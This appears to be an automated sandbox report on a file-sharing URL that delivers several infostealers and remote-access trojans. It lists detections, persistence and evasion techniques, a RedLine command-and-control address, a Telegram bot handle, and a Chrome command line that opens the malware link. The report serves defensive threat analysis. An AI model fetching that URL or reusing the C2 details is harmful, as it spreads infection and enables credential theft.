agenttesla | hxxps://files[.]sberdisk[.]ru/s/P3DeBi6dum3WFh1

Resubmissions

21-11-2023 21:13

231121-z23hksgf59 5

19-11-2023 00:12

231119-ahdmnsga83 10

18-11-2023 18:31

231118-w6jdqafc82 10

18-11-2023 16:08

231118-tlh64sfh3w 10

Analysis

max time kernel
1367s
max time network
1434s
platform
windows10-1703_x64
resource
win10-20231023-en
resource tags

arch:x64arch:x86image:win10-20231023-enlocale:en-usos:windows10-1703-x64system
submitted
18-11-2023 16:08

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://files.sberdisk.ru/s/P3DeBi6dum3WFh1

Score

10^/10

agenttesla raccoon redline xworm zgrat logsdiller cloud (telegram: @logsdillabot)evasion infostealer keylogger rat spyware stealer themida trojan upx

Malware Config

Extracted

Family

redline

Botnet

LogsDiller Cloud (Telegram: @logsdillabot)

194.49.94.40:21348

Signatures

AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
keylogger trojan stealer spyware agenttesla

Detect Xworm Payload 1 IoCs

Processes:

resource	yara_rule
behavioral2/files/0x000700000001ad4a-2992.dat	family_xworm

Detect ZGRat V1 18 IoCs

Processes:

resource	yara_rule
behavioral2/memory/5312-845-0x0000021CC8330000-0x0000021CC8414000-memory.dmp	family_zgrat_v1
behavioral2/memory/5312-856-0x0000021CC8330000-0x0000021CC8410000-memory.dmp	family_zgrat_v1
behavioral2/memory/5312-870-0x0000021CC8330000-0x0000021CC8410000-memory.dmp	family_zgrat_v1
behavioral2/memory/5312-860-0x0000021CC8330000-0x0000021CC8410000-memory.dmp	family_zgrat_v1
behavioral2/memory/5312-876-0x0000021CC8330000-0x0000021CC8410000-memory.dmp	family_zgrat_v1
behavioral2/memory/5312-857-0x0000021CC8330000-0x0000021CC8410000-memory.dmp	family_zgrat_v1
behavioral2/memory/5312-881-0x0000021CC8330000-0x0000021CC8410000-memory.dmp	family_zgrat_v1
behavioral2/memory/5312-886-0x0000021CC8330000-0x0000021CC8410000-memory.dmp	family_zgrat_v1
behavioral2/memory/5312-890-0x0000021CC8330000-0x0000021CC8410000-memory.dmp	family_zgrat_v1
behavioral2/memory/5312-894-0x0000021CC8330000-0x0000021CC8410000-memory.dmp	family_zgrat_v1
behavioral2/memory/5312-897-0x0000021CC8330000-0x0000021CC8410000-memory.dmp	family_zgrat_v1
behavioral2/memory/5312-900-0x0000021CC8330000-0x0000021CC8410000-memory.dmp	family_zgrat_v1
behavioral2/memory/5312-915-0x0000021CC8330000-0x0000021CC8410000-memory.dmp	family_zgrat_v1
behavioral2/memory/5312-906-0x0000021CC8330000-0x0000021CC8410000-memory.dmp	family_zgrat_v1
behavioral2/memory/5312-931-0x0000021CC8330000-0x0000021CC8410000-memory.dmp	family_zgrat_v1
behavioral2/memory/5564-984-0x0000000000950000-0x0000000000C54000-memory.dmp	family_zgrat_v1
behavioral2/memory/5312-923-0x0000021CC8330000-0x0000021CC8410000-memory.dmp	family_zgrat_v1
behavioral2/files/0x000600000001ada0-5095.dat	family_zgrat_v1

Process spawned unexpected child process 3 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

schtasks.exeschtasks.exeschtasks.exe

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	8812	3144	schtasks.exe	110
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5816	3144	schtasks.exe	110
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4784	3144	schtasks.exe	110

Raccoon
Raccoon is an infostealer written in C++ and first seen in 2019.
stealer raccoon

Raccoon Stealer payload 3 IoCs

Processes:

resource	yara_rule
behavioral2/memory/5756-925-0x0000000000400000-0x0000000000416000-memory.dmp	family_raccoon
behavioral2/memory/5756-918-0x0000000000400000-0x0000000000416000-memory.dmp	family_raccoon
behavioral2/memory/5756-901-0x0000000000400000-0x0000000000416000-memory.dmp	family_raccoon

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 1 IoCs

Processes:

resource	yara_rule
behavioral2/memory/700-1054-0x0000000000400000-0x000000000043C000-memory.dmp	family_redline

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
ZGRat
ZGRat is remote access trojan written in C#.
rat zgrat
Downloads MZ/PE file
Stops running service(s) 3 TTPs
evasion

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Executes dropped EXE 3 IoCs

Processes:

Lwsecure_beta.exebrandrock.exev1.exe

pid	Process
4532	Lwsecure_beta.exe
3136	brandrock.exe
4336	v1.exe

Themida packer 2 IoCs

Detects Themida, an advanced Windows software protection system.

themida

Processes:

resource	yara_rule
behavioral2/memory/5448-879-0x0000000001360000-0x0000000001AD4000-memory.dmp	themida
behavioral2/files/0x000600000001ad32-2880.dat	themida

UPX packed file 3 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral2/files/0x000600000001ad19-2208.dat	upx
behavioral2/files/0x000600000001ad99-4944.dat	upx
behavioral2/files/0x000600000001adfb-7415.dat	upx

Unexpected DNS network traffic destination 1 IoCs

Network traffic to other servers than the configured DNS servers was detected on the DNS port.

Processes:

description	ioc
Destination IP	51.159.66.125

Uses the VBS compiler for execution 1 TTPs

Scripting
T1064
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow	ioc
1523	api.ipify.org
1524	api.ipify.org

Launches sc.exe 13 IoCs

Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid	Process
8904	sc.exe
7652	sc.exe
8916	sc.exe
5416	sc.exe
7800	sc.exe
4708	sc.exe
7796	sc.exe
1192	sc.exe
8440	sc.exe
5836	sc.exe
6848	sc.exe
7132	sc.exe
6036	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 6 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	Process	procid_target
5456	5756	WerFault.exe
3884	5576	WerFault.exe	164
5604	5624	WerFault.exe	188
5432	5972	WerFault.exe	169
5888	6780	WerFault.exe	537
7840	5292	WerFault.exe	545

Creates scheduled task(s) 1 TTPs 19 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeSCHTASKS.exeschtasks.exe

pid	Process
5956	schtasks.exe
7608	schtasks.exe
6912	schtasks.exe
5892	schtasks.exe
8812	schtasks.exe
4820	schtasks.exe
6696	schtasks.exe
2144	schtasks.exe
6468	schtasks.exe
5816	schtasks.exe
7676	schtasks.exe
4784	schtasks.exe
5184	schtasks.exe
5696	schtasks.exe
8912	schtasks.exe
380	schtasks.exe
8904	schtasks.exe
7944	SCHTASKS.exe
7728	schtasks.exe

Delays execution with timeout.exe 3 IoCs

evasion

Processes:

timeout.exetimeout.exetimeout.exe

pid	Process
7160	timeout.exe
6280	timeout.exe
8256	timeout.exe

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

chrome.exechrome.exe

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Gathers network information 2 TTPs 2 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command and Scripting Interpreter

T1059

Processes:

ipconfig.exeipconfig.exe

pid	Process
7964	ipconfig.exe
5180	ipconfig.exe

Kills process with taskkill 1 IoCs

evasion

Processes:

taskkill.exe

pid	Process
5840	taskkill.exe

Modifies data under HKEY_USERS 3 IoCs

Processes:

chrome.exechrome.exe

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133447973365539795"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe

Modifies registry class 41 IoCs

Processes:

chrome.exechrome.exe

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-2184424523-918736138-622003966-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1"	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2184424523-918736138-622003966-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\Mode = "4"	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2184424523-918736138-622003966-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000007800000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	chrome.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2184424523-918736138-622003966-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\SniffedFolderType = "Generic"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-2184424523-918736138-622003966-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}	chrome.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2184424523-918736138-622003966-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}"	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2184424523-918736138-622003966-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByDirection = "1"	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2184424523-918736138-622003966-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-2184424523-918736138-622003966-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-2184424523-918736138-622003966-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell	chrome.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2184424523-918736138-622003966-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\SniffedFolderType = "Documents"	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2184424523-918736138-622003966-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2184424523-918736138-622003966-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1"	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2184424523-918736138-622003966-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 010000000200000000000000ffffffff	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2184424523-918736138-622003966-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupView = "0"	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2184424523-918736138-622003966-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1"	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2184424523-918736138-622003966-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-2184424523-918736138-622003966-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2184424523-918736138-622003966-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-2184424523-918736138-622003966-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2184424523-918736138-622003966-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2184424523-918736138-622003966-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\IconSize = "16"	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2184424523-918736138-622003966-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\FFlags = "1"	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2184424523-918736138-622003966-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\LogicalViewMode = "1"	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2184424523-918736138-622003966-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2184424523-918736138-622003966-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-2184424523-918736138-622003966-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1	chrome.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-2184424523-918736138-622003966-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-2184424523-918736138-622003966-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2184424523-918736138-622003966-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-2184424523-918736138-622003966-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-2184424523-918736138-622003966-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\2	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2184424523-918736138-622003966-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 020000000100000000000000ffffffff	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2184424523-918736138-622003966-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4"	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2184424523-918736138-622003966-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000007800000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	chrome.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2184424523-918736138-622003966-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-2184424523-918736138-622003966-1000_Classes\Local Settings	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-2184424523-918736138-622003966-1000_Classes\Local Settings	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2184424523-918736138-622003966-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\FFlags = "1092616257"	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2184424523-918736138-622003966-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByKey:PID = "0"	chrome.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 8 IoCs

Processes:

chrome.exechrome.exechrome.exesdiagnhost.exe

pid	Process
3664	chrome.exe
3664	chrome.exe
4536	chrome.exe
4536	chrome.exe
4536	chrome.exe
4536	chrome.exe
440	sdiagnhost.exe
440	sdiagnhost.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

chrome.exe

pid	Process
3476	chrome.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 9 IoCs

Processes:

chrome.exechrome.exe

pid	Process
3664	chrome.exe
3664	chrome.exe
3664	chrome.exe
3664	chrome.exe
3664	chrome.exe
4536	chrome.exe
4536	chrome.exe
4536	chrome.exe
4536	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

chrome.exe

description	pid	Process
Token: SeShutdownPrivilege	3664	chrome.exe
Token: SeCreatePagefilePrivilege	3664	chrome.exe
Token: SeShutdownPrivilege	3664	chrome.exe
Token: SeCreatePagefilePrivilege	3664	chrome.exe
Token: SeShutdownPrivilege	3664	chrome.exe
Token: SeCreatePagefilePrivilege	3664	chrome.exe
Token: SeShutdownPrivilege	3664	chrome.exe
Token: SeCreatePagefilePrivilege	3664	chrome.exe
Token: SeShutdownPrivilege	3664	chrome.exe
Token: SeCreatePagefilePrivilege	3664	chrome.exe
Token: SeShutdownPrivilege	3664	chrome.exe
Token: SeCreatePagefilePrivilege	3664	chrome.exe
Token: SeShutdownPrivilege	3664	chrome.exe
Token: SeCreatePagefilePrivilege	3664	chrome.exe
Token: SeShutdownPrivilege	3664	chrome.exe
Token: SeCreatePagefilePrivilege	3664	chrome.exe
Token: SeShutdownPrivilege	3664	chrome.exe
Token: SeCreatePagefilePrivilege	3664	chrome.exe
Token: SeShutdownPrivilege	3664	chrome.exe
Token: SeCreatePagefilePrivilege	3664	chrome.exe
Token: SeShutdownPrivilege	3664	chrome.exe
Token: SeCreatePagefilePrivilege	3664	chrome.exe
Token: SeShutdownPrivilege	3664	chrome.exe
Token: SeCreatePagefilePrivilege	3664	chrome.exe
Token: SeShutdownPrivilege	3664	chrome.exe
Token: SeCreatePagefilePrivilege	3664	chrome.exe
Token: SeShutdownPrivilege	3664	chrome.exe
Token: SeCreatePagefilePrivilege	3664	chrome.exe
Token: SeShutdownPrivilege	3664	chrome.exe
Token: SeCreatePagefilePrivilege	3664	chrome.exe
Token: SeShutdownPrivilege	3664	chrome.exe
Token: SeCreatePagefilePrivilege	3664	chrome.exe
Token: SeShutdownPrivilege	3664	chrome.exe
Token: SeCreatePagefilePrivilege	3664	chrome.exe
Token: SeShutdownPrivilege	3664	chrome.exe
Token: SeCreatePagefilePrivilege	3664	chrome.exe
Token: SeShutdownPrivilege	3664	chrome.exe
Token: SeCreatePagefilePrivilege	3664	chrome.exe
Token: SeShutdownPrivilege	3664	chrome.exe
Token: SeCreatePagefilePrivilege	3664	chrome.exe
Token: SeShutdownPrivilege	3664	chrome.exe
Token: SeCreatePagefilePrivilege	3664	chrome.exe
Token: SeShutdownPrivilege	3664	chrome.exe
Token: SeCreatePagefilePrivilege	3664	chrome.exe
Token: SeShutdownPrivilege	3664	chrome.exe
Token: SeCreatePagefilePrivilege	3664	chrome.exe
Token: SeShutdownPrivilege	3664	chrome.exe
Token: SeCreatePagefilePrivilege	3664	chrome.exe
Token: SeShutdownPrivilege	3664	chrome.exe
Token: SeCreatePagefilePrivilege	3664	chrome.exe
Token: SeShutdownPrivilege	3664	chrome.exe
Token: SeCreatePagefilePrivilege	3664	chrome.exe
Token: SeShutdownPrivilege	3664	chrome.exe
Token: SeCreatePagefilePrivilege	3664	chrome.exe
Token: SeShutdownPrivilege	3664	chrome.exe
Token: SeCreatePagefilePrivilege	3664	chrome.exe
Token: SeShutdownPrivilege	3664	chrome.exe
Token: SeCreatePagefilePrivilege	3664	chrome.exe
Token: SeShutdownPrivilege	3664	chrome.exe
Token: SeCreatePagefilePrivilege	3664	chrome.exe
Token: SeShutdownPrivilege	3664	chrome.exe
Token: SeCreatePagefilePrivilege	3664	chrome.exe
Token: SeShutdownPrivilege	3664	chrome.exe
Token: SeCreatePagefilePrivilege	3664	chrome.exe

Suspicious use of FindShellTrayWindow 61 IoCs

Processes:

chrome.exechrome.exemsdt.exe

pid	Process
3664	chrome.exe
3664	chrome.exe
3664	chrome.exe
3664	chrome.exe
3664	chrome.exe
3664	chrome.exe
3664	chrome.exe
3664	chrome.exe
3664	chrome.exe
3664	chrome.exe
3664	chrome.exe
3664	chrome.exe
3664	chrome.exe
3664	chrome.exe
3664	chrome.exe
3664	chrome.exe
3664	chrome.exe
3664	chrome.exe
3664	chrome.exe
3664	chrome.exe
3664	chrome.exe
3664	chrome.exe
3664	chrome.exe
3664	chrome.exe
3664	chrome.exe
3664	chrome.exe
3664	chrome.exe
3664	chrome.exe
3664	chrome.exe
3664	chrome.exe
3664	chrome.exe
3664	chrome.exe
3664	chrome.exe
3664	chrome.exe
4536	chrome.exe
4536	chrome.exe
4536	chrome.exe
4536	chrome.exe
4536	chrome.exe
4536	chrome.exe
4536	chrome.exe
4536	chrome.exe
4536	chrome.exe
4536	chrome.exe
4536	chrome.exe
4536	chrome.exe
4536	chrome.exe
4536	chrome.exe
4536	chrome.exe
4536	chrome.exe
4536	chrome.exe
4536	chrome.exe
4536	chrome.exe
4536	chrome.exe
4536	chrome.exe
4536	chrome.exe
4536	chrome.exe
4536	chrome.exe
4536	chrome.exe
4536	chrome.exe
1608	msdt.exe

Suspicious use of SendNotifyMessage 48 IoCs

Processes:

chrome.exechrome.exe

pid	Process
3664	chrome.exe
3664	chrome.exe
3664	chrome.exe
3664	chrome.exe
3664	chrome.exe
3664	chrome.exe
3664	chrome.exe
3664	chrome.exe
3664	chrome.exe
3664	chrome.exe
3664	chrome.exe
3664	chrome.exe
3664	chrome.exe
3664	chrome.exe
3664	chrome.exe
3664	chrome.exe
3664	chrome.exe
3664	chrome.exe
3664	chrome.exe
3664	chrome.exe
3664	chrome.exe
3664	chrome.exe
3664	chrome.exe
3664	chrome.exe
4536	chrome.exe
4536	chrome.exe
4536	chrome.exe
4536	chrome.exe
4536	chrome.exe
4536	chrome.exe
4536	chrome.exe
4536	chrome.exe
4536	chrome.exe
4536	chrome.exe
4536	chrome.exe
4536	chrome.exe
4536	chrome.exe
4536	chrome.exe
4536	chrome.exe
4536	chrome.exe
4536	chrome.exe
4536	chrome.exe
4536	chrome.exe
4536	chrome.exe
4536	chrome.exe
4536	chrome.exe
4536	chrome.exe
4536	chrome.exe

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

chrome.exe

pid	Process
3476	chrome.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

chrome.exe

description	pid	Process	procid_target
PID 3664 wrote to memory of 528	3664	chrome.exe	71
PID 3664 wrote to memory of 528	3664	chrome.exe	71
PID 3664 wrote to memory of 4280	3664	chrome.exe	74
PID 3664 wrote to memory of 4280	3664	chrome.exe	74
PID 3664 wrote to memory of 4280	3664	chrome.exe	74
PID 3664 wrote to memory of 4280	3664	chrome.exe	74
PID 3664 wrote to memory of 4280	3664	chrome.exe	74
PID 3664 wrote to memory of 4280	3664	chrome.exe	74
PID 3664 wrote to memory of 4280	3664	chrome.exe	74
PID 3664 wrote to memory of 4280	3664	chrome.exe	74
PID 3664 wrote to memory of 4280	3664	chrome.exe	74
PID 3664 wrote to memory of 4280	3664	chrome.exe	74
PID 3664 wrote to memory of 4280	3664	chrome.exe	74
PID 3664 wrote to memory of 4280	3664	chrome.exe	74
PID 3664 wrote to memory of 4280	3664	chrome.exe	74
PID 3664 wrote to memory of 4280	3664	chrome.exe	74
PID 3664 wrote to memory of 4280	3664	chrome.exe	74
PID 3664 wrote to memory of 4280	3664	chrome.exe	74
PID 3664 wrote to memory of 4280	3664	chrome.exe	74
PID 3664 wrote to memory of 4280	3664	chrome.exe	74
PID 3664 wrote to memory of 4280	3664	chrome.exe	74
PID 3664 wrote to memory of 4280	3664	chrome.exe	74
PID 3664 wrote to memory of 4280	3664	chrome.exe	74
PID 3664 wrote to memory of 4280	3664	chrome.exe	74
PID 3664 wrote to memory of 4280	3664	chrome.exe	74
PID 3664 wrote to memory of 4280	3664	chrome.exe	74
PID 3664 wrote to memory of 4280	3664	chrome.exe	74
PID 3664 wrote to memory of 4280	3664	chrome.exe	74
PID 3664 wrote to memory of 4280	3664	chrome.exe	74
PID 3664 wrote to memory of 4280	3664	chrome.exe	74
PID 3664 wrote to memory of 4280	3664	chrome.exe	74
PID 3664 wrote to memory of 4280	3664	chrome.exe	74
PID 3664 wrote to memory of 4280	3664	chrome.exe	74
PID 3664 wrote to memory of 4280	3664	chrome.exe	74
PID 3664 wrote to memory of 4280	3664	chrome.exe	74
PID 3664 wrote to memory of 4280	3664	chrome.exe	74
PID 3664 wrote to memory of 4280	3664	chrome.exe	74
PID 3664 wrote to memory of 4280	3664	chrome.exe	74
PID 3664 wrote to memory of 4280	3664	chrome.exe	74
PID 3664 wrote to memory of 4280	3664	chrome.exe	74
PID 3664 wrote to memory of 2788	3664	chrome.exe	73
PID 3664 wrote to memory of 2788	3664	chrome.exe	73
PID 3664 wrote to memory of 4540	3664	chrome.exe	75
PID 3664 wrote to memory of 4540	3664	chrome.exe	75
PID 3664 wrote to memory of 4540	3664	chrome.exe	75
PID 3664 wrote to memory of 4540	3664	chrome.exe	75
PID 3664 wrote to memory of 4540	3664	chrome.exe	75
PID 3664 wrote to memory of 4540	3664	chrome.exe	75
PID 3664 wrote to memory of 4540	3664	chrome.exe	75
PID 3664 wrote to memory of 4540	3664	chrome.exe	75
PID 3664 wrote to memory of 4540	3664	chrome.exe	75
PID 3664 wrote to memory of 4540	3664	chrome.exe	75
PID 3664 wrote to memory of 4540	3664	chrome.exe	75
PID 3664 wrote to memory of 4540	3664	chrome.exe	75
PID 3664 wrote to memory of 4540	3664	chrome.exe	75
PID 3664 wrote to memory of 4540	3664	chrome.exe	75
PID 3664 wrote to memory of 4540	3664	chrome.exe	75
PID 3664 wrote to memory of 4540	3664	chrome.exe	75
PID 3664 wrote to memory of 4540	3664	chrome.exe	75
PID 3664 wrote to memory of 4540	3664	chrome.exe	75
PID 3664 wrote to memory of 4540	3664	chrome.exe	75
PID 3664 wrote to memory of 4540	3664	chrome.exe	75
PID 3664 wrote to memory of 4540	3664	chrome.exe	75
PID 3664 wrote to memory of 4540	3664	chrome.exe	75

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://files.sberdisk.ru/s/P3DeBi6dum3WFh1
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
